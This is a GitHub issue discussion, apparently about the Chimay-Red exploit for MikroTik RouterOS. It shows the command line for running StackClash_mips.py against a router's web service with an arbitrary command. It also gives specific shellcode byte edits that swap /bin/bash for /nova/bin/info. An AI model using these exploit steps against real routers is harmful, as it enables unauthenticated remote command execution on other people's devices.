BigNerd95
commented
6 years ago Why do you want edit the shell code? Just write this command:
./StackClash_mips.py 192.168.8.1 80 www_binary '/nova/bin/info "your_mikrotik_command" 'Open Zveroloff opened 6 years ago
BigNerd95
commented
6 years ago Why do you want edit the shell code? Just write this command:
./StackClash_mips.py 192.168.8.1 80 www_binary '/nova/bin/info "your_mikrotik_command" '
Zveroloff
commented
6 years ago I want to rewrite it, because I'm dealing with already hacked device, and standard way is not working. Because the device is accessible by port 80 and reports the same (vulnerable) RouterOS version, my idea is to rewrite the shellcode to run just system utility, not bash. Possibly, the attackers made something to bash
BigNerd95
commented
6 years ago So edit this line https://github.com/BigNerd95/Chimay-Red/blob/master/StackClash_mips.py#L126 Replace
shell_code += b'/bin/bash\x00' with
shell_code += b'/nova/bin/info\x00' Edit line https://github.com/BigNerd95/Chimay-Red/blob/master/StackClash_mips.py#L129 Replace
shell_code += b'-c\x00'with
shell_code += b'\x20\x00'Now you can use it:
./StackClash_mips.py 192.168.8.1 80 www_binary "your_mikrotik_command"I didn't test this mods, but i think they will work
Zveroloff
commented
6 years ago Thanks, I thought about this, but this way I'll get execve("/nova/bin/info", ["/nova/bin/info", " ", "user_command"]), is it normal to repeat executable in parameter array?
BigNerd95
commented
6 years ago ...yes http://man7.org/linux/man-pages/man2/execve.2.html
argv is an array of argument strings passed to the new program. By
convention, the first of these strings (i.e., argv[0]) should contain
the filename associated with the file being executed.Oh, thank you!
Could you help with editing the shellcode? I want to send just /nova/bin/info, bypassing bash shell